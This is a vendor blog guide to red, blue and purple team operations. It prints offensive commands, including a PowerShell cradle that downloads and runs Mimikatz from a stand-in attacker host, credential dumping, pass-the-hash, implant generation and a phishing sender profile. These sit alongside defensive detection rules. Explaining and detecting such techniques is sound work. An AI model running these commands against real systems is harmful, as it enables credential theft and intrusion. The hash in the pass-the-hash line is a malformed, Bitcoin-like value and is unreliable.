Modern cybersecurity is not a passive discipline. Organisations that wait for attackers to reveal their weaknesses are always playing catch-up. Red team and blue team operations flip that dynamic, turning your own security professionals into controlled adversaries and defenders operating in a structured, intelligence-driven cycle. This guide breaks down how both teams operate, what tools they use, and how the interplay between them creates a measurably stronger security posture.
A red team is a group of security professionals whose mandate is to simulate real-world threat actors. They operate with the same tactics, techniques, and procedures (TTPs) used by advanced persistent threat (APT) groups, ransomware operators, and nation-state actors. Their goal is not simply to find vulnerabilities but to demonstrate the full impact of a realistic breach: from initial access through lateral movement to data exfiltration or business disruption.
Red team engagements differ fundamentally from penetration tests. A penetration test is typically scoped, time-boxed, and focused on vulnerability discovery. A red team operation is objective-based, often running for weeks or months, and deliberately avoids detection for as long as possible.
If your organisation is investing in security testing but has not yet moved beyond point-in-time penetration testing, the [adversarial simulation services at Redfox Cybersecurity](https://www.redfoxsec.com/services) offer a structured path toward full red team maturity.
## What Is a Blue Team in Cybersecurity?
The blue team is the defensive counterpart. These are the analysts, engineers, and architects responsible for detecting, responding to, and recovering from attacks. A capable blue team operates across multiple functions: log analysis, endpoint detection and response (EDR), network traffic analysis, threat intelligence integration, and incident response.
Blue teams are often evaluated unfairly. Defenders must succeed every time; attackers only need to succeed once. The value of a red team operation is precisely that it gives blue teams a safe, structured environment in which to practise failing, identifying gaps, and improving their detection coverage before a real adversary exploits those same gaps.
Every red team engagement begins with reconnaissance. This phase maps the organisation's external attack surface using passive and active techniques before a single packet is sent to a target system.
Tools used at this stage include:
Passive DNS and certificate enumeration:
amass enum -passive -d targetcorp.com -o recon_output.txt
subfinder -d targetcorp.com -all -o subfinder_results.txt[cta]
Certificate transparency log analysis:
curl -s "https://crt.sh/?q=%25.targetcorp.com&output=json" | \
jq -r '.[].name_value' | sort -u | grep -v '*' > ct_subdomains.txt[cta]
These commands surface forgotten subdomains, staging environments, and third-party integrations that rarely appear in scope documentation but frequently become initial access vectors.
Red teams use a variety of initial access methods depending on the engagement scope. Phishing remains statistically dominant, but external attack surface exploitation and supply chain compromise are increasingly common objectives.
Custom phishing infrastructure using GoPhish with a hardened sending profile:
# Configure GoPhish with a custom domain and DKIM-signed emails
# Sending profile example (config.json fragment)
{
"from": "it-helpdesk@mail.targetcorp-support.com",
"host": "smtp.sendgrid.net:587",
"username": "apikey",
"password": "SG.XXXXXXXXXXXX",
"tls": true,
"ignore_cert_errors": false
}[cta]
For external exploitation, red teams frequently target internet-facing applications using tools like Nuclei for templated vulnerability scanning:
nuclei -u https://vpn.targetcorp.com \
-t cves/ \
-t exposures/ \
-severity critical,high \
-o nuclei_findings.txt \
-stats[cta]
Once initial access is achieved, maintaining persistent, covert communication with implanted systems is critical. Modern red teams build layered C2 infrastructure to survive blue team countermeasures.
Cobalt Strike malleable C2 profile snippet for traffic blending:
set sleeptime "45000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
http-get {
set uri "/api/v2/telemetry/events";
client {
header "Accept" "application/json";
header "X-Request-ID" "a3f9b2c1-4e7d-11ec-81d3-0242ac130003";
metadata {
base64url;
prepend "session=";
header "Cookie";
}
}
}[cta]
Red teams also increasingly use open-source alternatives such as Sliver and Havoc Framework, which produce less detectable network signatures than commercial tools.
Sliver C2 listener setup:
sliver > generate --mtls targetcorp.com --os windows \
--arch amd64 --format exe \
--save /opt/payloads/beacon_v1.exe
sliver > mtls --lport 443[cta]
After establishing a foothold, red teams move laterally to simulate the progression a real adversary would take toward their objective. This frequently involves credential harvesting and abuse of legitimate administrative tools.
Extracting credentials with Mimikatz (run from an elevated context):
# In-memory execution to avoid touching disk
IEX (New-Object Net.WebClient).DownloadString('https://c2.attacker.lab/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'[cta]
Pass-the-hash lateral movement using CrackMapExec:
crackmapexec smb 10.10.10.0/24 \
-u Administrator \
-H aad3b435b51404eeaad3b435b51404ee:bc1qugrtknpjz52vc4m559q7zumkc4268kp7skrsee \
--shares[cta]
BloodHound for Active Directory attack path analysis:
# Ingestor collection from domain-joined host
SharpHound.exe --CollectionMethods All \
--Domain targetcorp.local \
--OutputDirectory C:\Temp\bh_output[cta]
BloodHound's graph-based visualisation reveals shortest attack paths to Domain Admin or Tier 0 assets that would otherwise take days to identify manually.
Understanding red team TTPs is only useful if the blue team can translate that knowledge into concrete detection logic. The following sections cover how capable blue teams hunt for and respond to the techniques described above.
A blue team without centralised logging is operating blind. The foundation of any detection capability is a well-tuned SIEM with coverage across endpoints, network devices, identity providers, and cloud environments.
Sigma rule for detecting Mimikatz-style LSASS access:
title: LSASS Memory Access by Non-System Process
id: 5ef4e65a-1a93-4f84-9a18-c3cb7c6a87f3
status: production
description: Detects suspicious access to LSASS memory, indicative of credential dumping
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
GrantedAccess|contains:
- '0x1010'
- '0x1410'
- '0x147a'
- '0x143a'
filter_system:
SourceImage|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
condition: selection and not filter_system
level: high
tags:
- attack.credential_access
- attack.t1003.001[cta]
Red team C2 traffic, even when blended with legitimate protocols, produces detectable anomalies. Blue teams running Zeek or Suricata can identify beaconing patterns, unusual DNS volumes, and TLS certificate anomalies.
Zeek script to flag long-duration, low-volume connections (indicative of beaconing):
event connection_state_remove(c: connection)
{
if ( c$duration > 300 secs && c$resp_bytes < 500 )
{
NOTICE([$note=Notice::Weird,
$conn=c,
$msg=fmt("Potential beacon: %s -> %s duration=%s bytes=%s",
c$id$orig_h, c$id$resp_h, c$duration, c$resp_bytes),
$identifier=cat(c$id$orig_h, c$id$resp_h)]);
}
}[cta]
Suricata rule detecting Cobalt Strike default certificate fingerprint:
alert tls any any -> any any (
msg:"Cobalt Strike Default TLS Certificate";
tls.subject; content:"CN=Major Cobalt Strike";
classtype:trojan-activity;
sid:9000001; rev:1;
)[cta]
When a red team implant is suspected, blue teams need rapid forensic capability across hundreds or thousands of endpoints simultaneously.
Velociraptor VQL query to hunt for suspicious scheduled tasks:
SELECT Name, Command, Arguments, Creator, CreationTime
FROM Artifact.Windows.System.ScheduledTasks()
WHERE Command =~ "powershell|cmd|wscript|cscript|mshta|regsvr32"
AND CreationTime > now() - 7 * 24 * 3600
ORDER BY CreationTime DESC[cta]
Blue team tooling like Velociraptor, combined with strong detection engineering practices, is where organisations see the greatest return from red team findings. The [defensive security services at Redfox Cybersecurity](https://www.redfoxsec.com/services) help teams build exactly this kind of scalable detection and response capability.
A purple team is not a separate function; it is a collaborative exercise in which red and blue team members work together in real time. The red team executes a technique, the blue team attempts to detect it, and both teams immediately share what they observed. This tight feedback loop accelerates detection engineering by orders of magnitude compared to running red team engagements in isolation.
A typical purple team exercise flow:
MITRE ATT&CK Navigator layer export for tracking coverage:
{
"name": "Purple Team Coverage Q2 2025",
"versions": {
"attack": "14",
"navigator": "4.9"
},
"domain": "enterprise-attack",
"techniques": [
{
"techniqueID": "T1055",
"score": 1,
"comment": "Detected via Sysmon Event ID 8 and EDR rule PR-4421"
},
{
"techniqueID": "T1003.001",
"score": 1,
"comment": "Sigma rule deployed, LSASS access alert confirmed"
},
{
"techniqueID": "T1071.001",
"score": 0,
"comment": "C2 over HTTP not yet detected, detection gap open"
}
]
}[cta]
Organisations serious about closing their detection gaps should consider structured purple team engagements as a quarterly practice rather than a one-off exercise. Redfox Cybersecurity's [adversarial security services](https://www.redfoxsec.com/services) include facilitated purple team workshops designed to produce measurable detection improvements within a single engagement cycle.
Every adversarial programme requires a well-defined rules of engagement (RoE) document before any testing begins. This document defines authorised targets, prohibited techniques (such as those affecting production availability), communication protocols for emergency deconfliction, and the escalation chain if a red team action triggers an unplanned incident.
A minimal RoE should cover:
Red team and blue team programmes are only as valuable as the metrics used to evaluate them. The following measurements provide a realistic picture of organisational security maturity:
Red team metrics:
Blue team metrics:
Tracking these metrics across multiple engagements over time reveals whether the programme is producing genuine security improvement or simply cycling through the same findings year after year.
Red team and blue team operations are not separate programmes running in parallel; they are two sides of a single security improvement process. The red team surfaces what is exploitable. The blue team learns to detect and disrupt it. The purple team model closes the loop, converting every engagement finding into a concrete, tested detection rule mapped to the MITRE ATT&CK framework.
Organisations that run this cycle consistently, with rigorous metrics and executive sponsorship, build a security posture that improves with each engagement rather than resetting to zero after every annual test.
If your organisation is ready to move from compliance-driven security testing toward a genuinely adversarial programme, the team at [Redfox Cybersecurity](https://www.redfoxsec.com/services) can design and deliver red team, blue team, and purple team engagements calibrated to your threat model, your industry, and your current detection maturity.